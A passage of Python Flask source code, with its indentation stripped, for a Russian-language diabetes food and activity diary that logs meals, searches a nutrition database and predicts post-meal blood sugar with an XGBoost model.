# Перенаправляем на страницу входа/регистрации
return redirect(url_for('login'))
@app.route('/login', methods=['GET', 'POST'])
def login():
# Авторизация пользователя
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is None:
user = User.query.filter_by(email=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
return redirect(url_for('lk'))
form.username.errors.append('')
form.password.errors.append('Неверно введено имя пользователя \
или пароль')
form.password.data = ''
return render_template('LO.html', form=form)
@app.route('/signup', methods=['GET', 'POST'])
def signup():
# Регистрация пользователя
form = RegisterForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data,
method='sha256')
BMI = form.weight.data/((form.height.data/100)*(form.height.data/100))
BMIdata = str(BMI)
new_user = User(username=form.username.data,
username1=form.username1.data, email=form.email.data,
password=hashed_password, BMI=BMIdata, doc=form.select.data)
db.session.add(new_user)
db.session.commit()
db.session.close()
return redirect(url_for('login'))
return render_template('SU.html', form=form)
@app.route('/logout')
@login_required
def logout():
# Выход из сети
logout_user()
return redirect(url_for('login'))
@app.route('/news')
@login_required
def news():
# Главная страница
path = os.path.dirname(os.path.abspath(__file__))
db_2 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_2)
cur = con.cursor()
cur.execute("""SELECT food,libra FROM basket WHERE user_id = ?""",
(session['user_id'],))
result = cur.fetchall()
len2 = len(result)+1
con.close()
return render_template("searching.html", result=result, len = len2)
@app.route('/onlinepredict', methods=['GET', 'POST'])
@login_required
def pred():
if request.method == 'POST':
jsoninfo = request.get_json()
path = os.path.dirname(os.path.abspath(__file__))
db_21 = os.path.join(path, 'diacompanion.db')
model = os.path.join(path, 'model.model')
con = sqlite3.connect(db_21)
cur = con.cursor()
cur.execute('''SELECT BMI FROM user WHERE id = ?''',(session['user_id'],))
BMI0 = cur.fetchall()
BMI0 = BMI0[0][0]
nutr = list()
for i in range(len(jsoninfo['foodname'])):
cur.execute("""SELECT gi,carbo,prot,kr
FROM food WHERE name = ?""",
(jsoninfo['foodname'][i].split('//')[0],))
nutrients = cur.fetchall()
nutr.append(nutrients[0])
cur.execute("""SELECT date,time,type,BG0,gi,carbo,prot,kr FROM favourites
WHERE user_id = ?""", (session["user_id"],))
tb1 = cur.fetchall()
con.close()
tb1 = pd.DataFrame(tb1, columns=['date', 'time', 'types_food_n', 'BG0',
'GI', 'carbo', 'prot', 'kr'])
tb1['GI'] = pd.to_numeric(tb1['GI'], downcast='float')
tb1['carbo'] = pd.to_numeric(tb1['carbo'], downcast='float')
tb1['prot'] = pd.to_numeric(tb1['prot'], downcast='float')
tb1['kr'] = pd.to_numeric(tb1['kr'], downcast='float')
tb1['BG0'] = pd.to_numeric(tb1['BG0'], downcast='float')
tb = pd.DataFrame(nutr, columns=['GI','carbo','prot','kr'])
datenumb = jsoninfo['Date'].split('-')
ddmmyy = '.'.join([datenumb[2],datenumb[1],datenumb[0]])
date = pd.Series([ddmmyy]*len(tb['GI']))
tb['date'] = date
time = pd.Series([jsoninfo['Time']]*len(tb['GI']))
tb['time'] = time
typ_e = pd.Series([jsoninfo['Type']]*len(tb['GI']))
tb['types_food_n'] = typ_e
BG0 = pd.Series([jsoninfo['BG0']]*len(tb['GI']))
tb['BG0'] = BG0
tb = tb[['date','time','types_food_n','BG0','GI','carbo','prot','kr']]
tb['GI'] = pd.to_numeric(tb['GI'], downcast='float')
tb['carbo'] = pd.to_numeric(tb['carbo'], downcast='float')
tb['prot'] = pd.to_numeric(tb['prot'], downcast='float')
tb['kr'] = pd.to_numeric(tb['kr'], downcast='float')
tb['BG0'] = pd.to_numeric(tb['BG0'], downcast='float')
tb = pd.merge(left=tb, right=tb1, on=['date','time','types_food_n','BG0','GI','carbo','prot','kr'], how='outer')
tb = tb.groupby(['date', 'time', 'types_food_n', 'BG0'],
as_index=False).sum()
tb['GL'] = tb['GI']*tb['carbo']/100
tb['DateTime'] = tb['date'] + ' ' + tb['time']
tb['DateTime'] = pd.to_datetime(tb['DateTime'], format='%d.%m.%Y %H:%M')
tb = tb.drop(['date', 'time', 'GI'], axis=1)
prot = list()
for i in range(len(tb['DateTime'])):
start_date = tb['DateTime'][i]
mask = (tb['DateTime']
<= start_date) & (tb['DateTime']
>= (start_date
- pd.Timedelta(value=6, unit='h')))
prot_b6h = tb.loc[mask]['prot'].aggregate(np.sum)
prot.append(prot_b6h)
tb.insert(7, 'prot_b6h', prot, True)
tb = tb.drop(['prot'], axis=1)
BMI = list()
for i in range(len(tb['DateTime'])):
BMI.append(BMI0)
if tb['types_food_n'][i] == 'Завтрак':
tb['types_food_n'][i] = 1
elif tb['types_food_n'][i] == 'Обед':
tb['types_food_n'][i] = 2
elif tb['types_food_n'][i] == 'Ужин':
tb['types_food_n'][i] = 3
else:
tb['types_food_n'][i] = 4
tb.insert(7, 'BMI', BMI, True)
tb = tb.reindex(columns=["DateTime", "BG0", "GL", "carbo", "prot_b6h",
"types_food_n", "kr", "BMI"])
predict = list()
for i in range(len(tb['DateTime'])):
best_model = xgb.Booster()
best_model.load_model(model)
core_features = ["BG0", "gl", "carbo",
"prot_b6h", "types_food_n", "kr", "BMI"]
X_test = [tb.iloc[i, 1:7].values.tolist()]
predicted = best_model.predict(xgb.DMatrix(np.array(X_test)))
predict.append(predicted[0])
tb.insert(3, 'Предсказанный сахар после', predict, True)
date3 = list()
time3 = list()
tb['Прием пищи'] = tb['types_food_n']
for i in range(len(tb['DateTime'])):
date3.append(tb['DateTime'][i].strftime('%d.%m.%Y'))
time3.append(tb['DateTime'][i].strftime('%H:%M'))
if tb['Прием пищи'][i] == 1:
tb['Прием пищи'][i] = 'Завтрак'
elif tb['Прием пищи'][i] == 2:
tb['Прием пищи'][i] = 'Обед'
elif tb['Прием пищи'][i] == 3:
tb['Прием пищи'][i] = 'Ужин'
else:
tb['Прием пищи'][i] = 'Перекус'
tb.insert(0, 'Дата', date3, True)
tb.insert(1, 'Время', time3, True)
tb = tb.drop(['DateTime'], axis=1)
tb = tb.drop(['types_food_n'], axis=1)
tb['Сахар до'] = tb['BG0']
tb = tb.drop(['BG0'], axis=1)
tb['Гликемическая нагрузка'] = tb['GL']
tb = tb.drop(['GL'], axis=1)
tb = tb.drop(['carbo'], axis=1)
tb = tb.drop(['prot_b6h'], axis=1)
tb = tb.drop(['kr'], axis=1)
tb = tb.drop(["BMI"], axis=1)
tb = tb[['Дата', 'Время', 'Прием пищи', 'Сахар до',
'Предсказанный сахар после', 'Гликемическая нагрузка']]
mask1 = (tb['Дата'] == ddmmyy) & (tb['Время'] == jsoninfo['Time'])
BG1 = tb.loc[mask1]['Предсказанный сахар после'].aggregate(np.sum)
if (BG1 > 0.1)&(BG1 < 7):
messag_e = 'УСК после еды в норме'
elif BG1 < 0.1:
messag_e = ''
else:
messag_e = 'УСК после еды превысит норму'
list2 = jsonify({"BG1": messag_e})
response = make_response(list2, 200)
return response
@app.route('/search_page')
@login_required
def search_page():
# Поисковая страница
return render_template("searching.html")
@app.route('/searchlink/<string:search_string>')
@login_required
def searchlink(search_string):
# Работа селекторного меню "выбрать категорию"
path = os.path.dirname(os.path.abspath(__file__))
db_3 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_3)
cur = con.cursor()
cur.execute("""SELECT name,_id
FROM food WHERE category LIKE ?""", ('%{}%'.format(search_string),))
result = cur.fetchall()
list1 = pd.DataFrame(result, columns=['name','id'])
list2 = list()
for i in range(len(list1['name'])):
cur.execute("""SELECT receipt,name
FROM recipes WHERE name LIKE ?""", (list1['name'][i],))
receipt = cur.fetchall()
try:
list2.append(receipt[0])
except IndexError:
list2.append(('',''))
con.close()
list2 = pd.DataFrame(list2, columns=['receipt','name'])
lis_t = pd.merge(left=list1, right=list2, on='name', how='left')
lis_t = lis_t.replace(np.nan, '', regex=True)
len1 = len(lis_t['receipt'])
return render_template('searching_add.html', name=lis_t['name'], receipt=lis_t['receipt'],
id=lis_t['id'], len=len1)
@app.route('/search', methods=['GET', 'POST'])
@login_required
def search():
# Основная функция сайта - поиск по базе данных
if request.method == 'POST':
search_string = request.form['input_query']
search_string = search_string.capitalize()
path = os.path.dirname(os.path.abspath(__file__))
db_4 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_4)
cur = con.cursor()
cur.execute(""" SELECT category FROM foodGroups""")
category_a = cur.fetchall()
if (request.form['input_query'],) in category_a:
cur.execute('''SELECT name,_id FROM food
WHERE category LIKE ?''', ('%{}%'.format(search_string),))
result = cur.fetchall()
list1 = pd.DataFrame(result, columns=['name','id'])
list2 = list()
for i in range(len(list1['name'])):
cur.execute("""SELECT receipt,name
FROM recipes WHERE name LIKE ?""", (list1['name'][i],))
receipt = cur.fetchall()
try:
list2.append(receipt[0])
except IndexError:
list2.append(('',''))
list2 = pd.DataFrame(list2, columns=['receipt','name'])
lis_t = pd.merge(left=list1, right=list2, on='name', how='left')
lis_t = lis_t.replace(np.nan, '', regex=True)
len1 = len(lis_t['receipt'])
else:
cur.execute('''SELECT name,_id FROM food
WHERE name LIKE ?
GROUP BY name''', ('%{}%'.format(search_string),))
result = cur.fetchall()
list1 = pd.DataFrame(result, columns=['name','id'])
list2 = list()
for i in range(len(list1['name'])):
cur.execute("""SELECT receipt,name
FROM recipes WHERE name LIKE ?""", (list1['name'][i],))
receipt = cur.fetchall()
try:
list2.append(receipt[0])
except IndexError:
list2.append(('',''))
list2 = pd.DataFrame(list2, columns=['receipt','name'])
lis_t = pd.merge(left=list1, right=list2, on='name', how='left')
lis_t = lis_t.replace(np.nan, '', regex=True)
len1 = len(lis_t['receipt'])
con.close()
return render_template('searching_add.html', name=lis_t['name'], receipt=lis_t['receipt'],
id=lis_t['id'], len=len1)
@app.route('/favourites', methods=['POST', 'GET'])
@login_required
def favour():
# Добавляем блюда в предварительный список
if request.method == 'POST':
L1 = request.form.getlist('row')
libra = request.form['libra']
path = os.path.dirname(os.path.abspath(__file__))
db_5 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_5)
cur = con.cursor()
for i in range(len(L1)):
cur.execute(f"""INSERT INTO basket (user_id, food, libra)
VALUES (?,?,?)""",
(session['user_id'], L1[i], libra))
con.commit()
con.close()
return redirect(url_for('news'))
@app.route('/favourites_dell', methods=['POST', 'GET'])
@login_required
def favour_dell():
# Удаление ошибочных записей из "предварительного" списка
if request.method == 'POST':
flist = request.form.getlist('row')
food = []
libra = []
for i in range(len(flist)):
flist[i] = flist[i].split('//')
food.append(flist[i][0])
libra.append(flist[i][1])
for i in range(len(food)):
path = os.path.dirname(os.path.abspath(__file__))
db_6 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_6)
cur = con.cursor()
cur.execute("""DELETE FROM basket WHERE user_id = ? AND food = ?
AND libra = ?""",
(session['user_id'], food[i], libra[i]))
con.commit()
con.close()
return redirect(url_for('news'))
@app.route('/favourites_add', methods=['POST', 'GET'])
@login_required
def favour_add():
# Добавляем блюда в основную базу данных и стираем временный список basket
if request.method == 'POST':
brf1 = datetime.time(7, 0)
brf2 = datetime.time(11, 30)
obed1 = datetime.time(12, 0)
obed2 = datetime.time(15, 0)
ujin1 = datetime.time(18, 0)
ujin2 = datetime.time(22, 0)
now = datetime.datetime.now().time()
time = request.form['timer']
if time == "":
x = datetime.datetime.now().time()
time = x.strftime("%R")
else:
x = datetime.datetime.strptime(time, "%H:%M")
time = x.strftime("%R")
date = request.form['calendar']
if date == "":
y = datetime.datetime.today().date()
date = y.strftime("%d.%m.%Y")
week_day = y.strftime("%A")
else:
y = datetime.datetime.strptime(date, "%Y-%m-%d")
y = y.date()
date = y.strftime("%d.%m.%Y")
week_day = y.strftime("%A")
if week_day == 'Monday':
week_day = 'Понедельник'
elif week_day == 'Tuesday':
week_day = 'Вторник'
elif week_day == 'Wednesday':
week_day = 'Среда'
elif week_day == 'Thursday':
week_day = 'Четверг'
elif week_day == 'Friday':
week_day = 'Пятница'
elif week_day == 'Saturday':
week_day = 'Суббота'
else:
week_day = 'Воскресенье'
typ = request.form['food_type']
if typ == "Авто":
if brf2 < now < brf1:
typ = "Завтрак"
elif obed1 < now < obed2:
typ = "Обед"
elif ujin1 < now < ujin2:
typ = "Ужин"
else:
typ = "Перекус"
path = os.path.dirname(os.path.abspath(__file__))
db_7 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_7)
cur = con.cursor()
# Достаем названия и граммы из временно созданной корзины basket
cur.execute("""SELECT food FROM basket WHERE user_id = ?""",
(session['user_id'],))
L1 = cur.fetchall()
cur.execute("""SELECT libra FROM basket WHERE user_id = ?""",
(session['user_id'],))
libra = cur.fetchall()
BG0 = request.form['sug']
# Достаем все необходимые для диеты параметры
elem1 = ['prot', 'carbo', 'fat', 'ec', 'water', 'mds', 'kr',
'pv', 'ok', 'zola', 'na', 'k', 'ca', 'mg', 'p',
'fe', 'a', 'kar', 're', 'b1', 'b2', 'rr', 'c', 'hol',
'nzhk', 'ne', 'te', 'gi']
elem2 = ['prot', 'carbo', 'fat', 'energy', 'water', 'mds', 'kr',
'pv', 'ok', 'zola', 'na', 'k', 'ca', 'mg', 'p', 'fe', 'a',
'kar', 're', 'b1', 'b2', 'rr', 'c', 'hol', 'nzhk', 'ne', 'te',
'gi']
for i in range(len(L1)):
cur.execute("""INSERT INTO favourites
(user_id,week_day,date,time,type,food,libra, BG0)
VALUES (?,?,?,?,?,?,?,?)""", (session['user_id'],
week_day, date, time,
typ,
L1[i][0],
libra[i][0],
BG0))
for elem, elem3 in zip(elem1, elem2):
cur.execute(f"""SELECT {elem} FROM food
WHERE name = ?""", (L1[i][0],))
elem = cur.fetchall()
if elem[0][0] is None:
elem00 = '0'
else:
elem00 = elem[0][0]
cur.execute(f"""UPDATE favourites SET {elem3} = {elem00}
WHERE user_id = ? AND week_day = ?
AND date = ?
AND time = ?
AND type = ? AND food = ? AND libra = ?""",
(session['user_id'], week_day, date, time, typ,
L1[i][0], libra[i][0]))
cur.execute(""" UPDATE favourites SET micr = '' """)
cur.execute("""DELETE FROM basket WHERE user_id = ?""",
(session['user_id'],))
con.commit()
con.close()
return redirect(url_for('news'))
@app.route('/activity')
@login_required
def activity():
# Страница физической активности
path = os.path.dirname(os.path.abspath(__file__))
db_8 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_8)
cur = con.cursor()
cur.execute("""SELECT date,time,min,type,user_id
FROM activity WHERE user_id = ?""", (session['user_id'],))
Act = cur.fetchall()
cur.execute("""SELECT date,time,hour,type,user_id
FROM sleep WHERE user_id = ?""", (session['user_id'],))
Sleep = cur.fetchall()
con.close()
return render_template('activity.html', Act=Act, Sleep=Sleep)
@app.route('/add_activity', methods=['POST'])
@login_required
def add_activity():
# Добавляем нагрузку в базу данных
if request.method == 'POST':
date = datetime.datetime.strptime(request.form['calendar'], "%Y-%m-%d")
date = date.strftime("%d.%m.%Y")
min1 = request.form['min']
type1 = request.form['type1']
if type1 == '1':
type1 = 'Ходьба'
elif type1 == '2':
type1 = 'Зарядка'
elif type1 == '3':
type1 = 'Спорт'
elif type1 == '4':
type1 = 'Уборка в квартире'
elif type1 == '5':
type1 = 'Работа в огороде'
else:
type1 = 'Сон'
time1 = request.form['timer']
path = os.path.dirname(os.path.abspath(__file__))
db_9 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_9)
cur = con.cursor()
if type1 == 'Сон':
cur.execute("""INSERT INTO sleep (user_id,date,time,hour,type)
VALUES(?,?,?,?,?)""",
(session['user_id'], date, time1, min1, type1))
else:
cur.execute("""INSERT INTO activity
(user_id,date,time,min,type,empty)
VALUES(?,?,?,?,?,?)""",
(session['user_id'], date, time1, min1, type1, ' '))
con.commit()
con.close()
return redirect(url_for('activity'))
@app.route('/lk')
@login_required
def lk():
# Выводим названия блюд (дневник на текущую неделю)
session['username'] = current_user.username
session['user_id'] = current_user.id
session['date'] = datetime.datetime.today().date()
td = datetime.datetime.today().date()
if td.strftime("%A") == 'Monday':
delta = datetime.timedelta(0)
elif td.strftime("%A") == 'Tuesday':
delta = datetime.timedelta(1)
elif td.strftime("%A") == 'Wednesday':
delta = datetime.timedelta(2)
elif td.strftime("%A") == 'Thursday':
delta = datetime.timedelta(3)
elif td.strftime("%A") == 'Friday':
delta = datetime.timedelta(4)
elif td.strftime("%A") == 'Saturday':
delta = datetime.timedelta(5)
else:
delta = datetime.timedelta(6)
m = td - delta
M = m.strftime("%d.%m.%Y")
t = m + datetime.timedelta(1)
T = t.strftime("%d.%m.%Y")
w = m + datetime.timedelta(2)
W = w.strftime("%d.%m.%Y")
tr = m + datetime.timedelta(3)
TR = tr.strftime("%d.%m.%Y")
fr = m + datetime.timedelta(4)
FR = fr.strftime("%d.%m.%Y")
st = m + datetime.timedelta(5)
ST = st.strftime("%d.%m.%Y")
sd = m + datetime.timedelta(6)
SD = sd.strftime("%d.%m.%Y")
path = os.path.dirname(os.path.abspath(__file__))
db_10 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_10)
cur = con.cursor()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Понедельник',
'Завтрак', M))
MondayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""",
(session['user_id'], 'Понедельник', 'Обед', M))
MondayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""",
(session['user_id'], 'Понедельник', 'Ужин', M))
MondayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Понедельник',
'Перекус', M))
MondayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Вторник',
'Завтрак', T))
TuesdayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Вторник',
'Обед', T))
TuesdayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Вторник',
'Ужин', T))
TuesdayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Вторник',
'Перекус', T))
TuesdayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Среда',
'Завтрак', W))
WednesdayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Среда',
'Обед', W))
WednesdayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Среда',
'Ужин', W))
WednesdayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Среда',
'Перекус', W))
WednesdayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Четверг',
'Завтрак', TR))
ThursdayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Четверг',
'Обед', TR))
ThursdayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Четверг',
'Ужин', TR))
ThursdayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Четверг',
'Перекус', TR))
ThursdayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Пятница',
'Завтрак', FR))
FridayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Пятница',
'Обед', FR))
FridayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Пятница',
'Ужин', FR))
FridayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type FROM favourites
WHERE user_id = ? AND week_day = ?
AND type = ?
AND date= ?""", (session['user_id'], 'Пятница',
'Перекус', FR))
FridayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Суббота',
'Завтрак', ST))
SaturdayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Суббота',
'Обед', ST))
SaturdayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Суббота',
'Ужин', ST))
SaturdayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type = ?
AND date = ?""", (session['user_id'], 'Суббота',
'Перекус', ST))
SaturdayP = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type =?
AND date = ?""", (session['user_id'], 'Воскресенье',
'Завтрак', SD))
SundayZ = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type =?
AND date = ?""", (session['user_id'], 'Воскресенье',
'Обед', SD))
SundayO = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type =?
AND date = ?""", (session['user_id'], 'Воскресенье',
'Ужин', SD))
SundayY = cur.fetchall()
cur.execute(""" SELECT food,week_day,time,date,type
FROM favourites WHERE user_id = ?
AND week_day = ?
AND type =?
AND date = ?""", (session['user_id'], 'Воскресенье',
'Перекус', SD))
SundayP = cur.fetchall()
cur.execute("""SELECT date FROM full_days
WHERE id = ?""", (session['user_id'],))
date1 = cur.fetchall()
cur.execute("""SELECT doc FROM user
WHERE id = ?""", (session['user_id'],))
doc = cur.fetchall()
con.close()
list1 = dict()
for i in range(len(date1)):
list1.update({
f'{date1[i][0]}': '',
})
return render_template('bootstrap_lk.html', name=session['username'],
MondayZ=MondayZ,
MondayO=MondayO,
MondayY=MondayY,
MondayP=MondayP,
TuesdayZ=TuesdayZ,
TuesdayO=TuesdayO,
TuesdayY=TuesdayY,
TuesdayP=TuesdayP,
WednesdayZ=WednesdayZ,
WednesdayO=WednesdayO,
WednesdayY=WednesdayY,
WednesdayP=WednesdayP,
ThursdayZ=ThursdayZ,
ThursdayO=ThursdayO,
ThursdayY=ThursdayY,
ThursdayP=ThursdayP,
FridayZ=FridayZ,
FridayO=FridayO,
FridayY=FridayY,
FridayP=FridayP,
SaturdayZ=SaturdayZ,
SaturdayO=SaturdayO,
SaturdayY=SaturdayY,
SaturdayP=SaturdayP,
SundayZ=SundayZ,
SundayO=SundayO,
SundayY=SundayY,
SundayP=SundayP,
m=M,
t=T,
w=W,
tr=TR,
fr=FR,
st=ST,
sd=SD,
list1=list1,
doc=doc)
@app.route('/delete', methods=['POST'])
@login_required
def delete():
# Удаление данных из дневника приемов пищи за неделю
if request.method == 'POST':
path = os.path.dirname(os.path.abspath(__file__))
db_11 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_11)
cur = con.cursor()
L = request.form.getlist('checked')
for i in range(len(L)):
L1 = L[i].split('//')
cur.execute('''DELETE FROM favourites WHERE food = ?
AND date = ?
AND time = ?
AND type = ?
AND user_id = ?''', (L1[0], L1[1], L1[2], L1[3],
session['user_id']))
cur.execute("""INSERT INTO deleted
(id, date, time, type, additional)
VALUES (?,?,?,?,?)""", (session['user_id'],
L1[1], L1[2],
'Прием пищи', L1[3]))
con.commit()
con.close()
return redirect(url_for('lk'))
@app.route('/remove', methods=['POST'])
@login_required
def remove():
# Удаление данных из физической активности за неделю
if request.method == 'POST':
path = os.path.dirname(os.path.abspath(__file__))
db_12 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_12)
cur = con.cursor()
L = request.form.getlist('selected')
for i in range(len(L)):
L1 = L[i].split('/')
if L1[3] != 'Сон':
cur.execute('''DELETE FROM activity WHERE date = ?
AND time = ?
AND min = ?
AND type = ?
AND user_id = ?''', (L1[0], L1[1], L1[2], L1[3],
session['user_id']))
cur.execute("""INSERT INTO deleted
(id,date,time,type,additional)
VALUES (?,?,?,?,?)""", (session["user_id"], L1[0],
L1[1],
'Физическая активность',
L1[3]+', '+L1[2]+' минут'))
else:
cur.execute('''DELETE FROM sleep WHERE date = ?
AND time = ?
AND hour = ?
AND type = ?
AND user_id = ?''', (L1[0], L1[1], L1[2], L1[3],
session['user_id']))
cur.execute("""INSERT INTO deleted
(id,date,time,type,additional)
VALUES (?,?,?,?,?)""", (session['user_id'], L1[0],
L1[1],
'Физическая активность',
L1[3]+', '+L1[2]+' часов'))
con.commit()
con.close()
return redirect(url_for('activity'))
@app.route('/arch')
@login_required
def arch():
# Архив за все время
path = os.path.dirname(os.path.abspath(__file__))
db_13 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_13)
cur = con.cursor()
cur.execute(
"""SELECT date,time,type,food,libra,carbo,prot,fat,energy
FROM favourites WHERE user_id = ?""", (session['user_id'],))
L = cur.fetchall()
con.close()
tbl = pd.DataFrame(L, columns=['Дата', 'Время', 'Прием пищи', 'Продукты',
'Граммы', 'Углеводы', 'Белки', 'Жиры',
'ККал'])
tbl["Дата1"] = \
pd.to_datetime(tbl['Дата'], format='%d.%m.%Y')
tbl = tbl.sort_values(by="Дата1")
tbl = tbl.drop(["Дата1"], axis=1)
tbl = \
tbl.groupby(
['Дата',
'Время',
'Прием пищи']).agg({
"Продукты": lambda tags: "br".join(tags),
"Граммы": lambda tags: "br".join(tags),
"Углеводы": lambda tags: "br".join(tags),
"Белки": lambda tags: "br".join(tags),
"Жиры": lambda tags: "br".join(tags),
"ККал":
lambda tags: "br".join(tags)}).reset_index()
tbl = tbl.to_html(classes='table table-hover', index=False,
justify='left').replace('br', '</p>')
tbl = tbl.replace('<thead>', '<thead class="thead-light">')
tbl = tbl.replace('<table border="1" class="dataframe table table-hover">',
'<table class="table table-hover" aria-busy="false">')
tbl = tbl.replace('<th>index</th>',
'<th>Дата</th><th>Время</th><th>Прием пищи</th>')
tbl = tbl.replace('<th>Прием пищи</th>',
'<th style="white-space:nowrap;">Прием пищи</th>')
tbl = tbl.replace('<th>ККал</th>',
'<th style="white-space:nowrap;">ККал</th>')
tbl = tbl.replace('<td>', '<td class="align-middle">')
return render_template('arch.html', tbl=tbl)
@app.route('/days', methods=['GET', 'POST'])
@login_required
def days():
# Список полных дней
if request.method == 'POST':
days1 = request.form.getlist("full_days")
day_s = days1[0].split(",")
path = os.path.dirname(os.path.abspath(__file__))
db_14 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_14)
cur = con.cursor()
for i in range(len(day_s)):
cur.execute("""INSERT INTO full_days (id,date) VALUES (?,?)""",
(session["user_id"], day_s[i]))
con.commit()
con.close()
return redirect(url_for('lk'))
def do_tb():
global fio
# Получили все необходимые данные из базы данных
path = os.path.dirname(os.path.abspath(__file__))
db_15 = os.path.join(path, 'diacompanion.db')
model = os.path.join(path, 'model.model')
con = sqlite3.connect(db_15)
cur = con.cursor()
cur.execute('''SELECT date,time,type,
food,libra,carbo,prot,
fat,energy,micr,water,mds,kr,pv,ok,
zola,na,k,ca,mg,p,fe,a,kar,re,b1,b2,
rr,c,hol,nzhk,ne,te,gi FROM favourites
WHERE user_id = ?''', (session['user_id'],))
L = cur.fetchall()
cur.execute('''SELECT date,time,min,type,empty FROM activity
WHERE user_id = ?''', (session['user_id'],))
L1 = cur.fetchall()
cur.execute('''SELECT date,time,hour FROM sleep
WHERE user_id =?''', (session['user_id'],))
L2 = cur.fetchall()
cur.execute('''SELECT DISTINCT date FROM
favourites WHERE user_id = ?''', (session['user_id'],))
date = cur.fetchall()
cur.execute("""SELECT DISTINCT date FROM full_days WHERE id = ?""",
(session["user_id"],))
full_days = cur.fetchall()
cur.execute("""SELECT*FROM deleted WHERE id = ?""",
(session["user_id"],))
deleted = cur.fetchall()
cur.execute("""SELECT date,time,type,BG0,gi,carbo,prot,kr FROM favourites
WHERE user_id = ?""", (session["user_id"],))
tb = cur.fetchall()
cur.execute('''SELECT username1 FROM user WHERE id = ?''',
(session['user_id'],))
fio = cur.fetchall()
cur.execute('''SELECT BMI FROM user WHERE id = ?''',
(session['user_id'],))
BMI0 = cur.fetchall()
BMI0 = BMI0[0][0]
con.close()
# Приемы пищи
food_weight = pd.DataFrame(L, columns=['Дата', 'Время', 'Прием пищи',
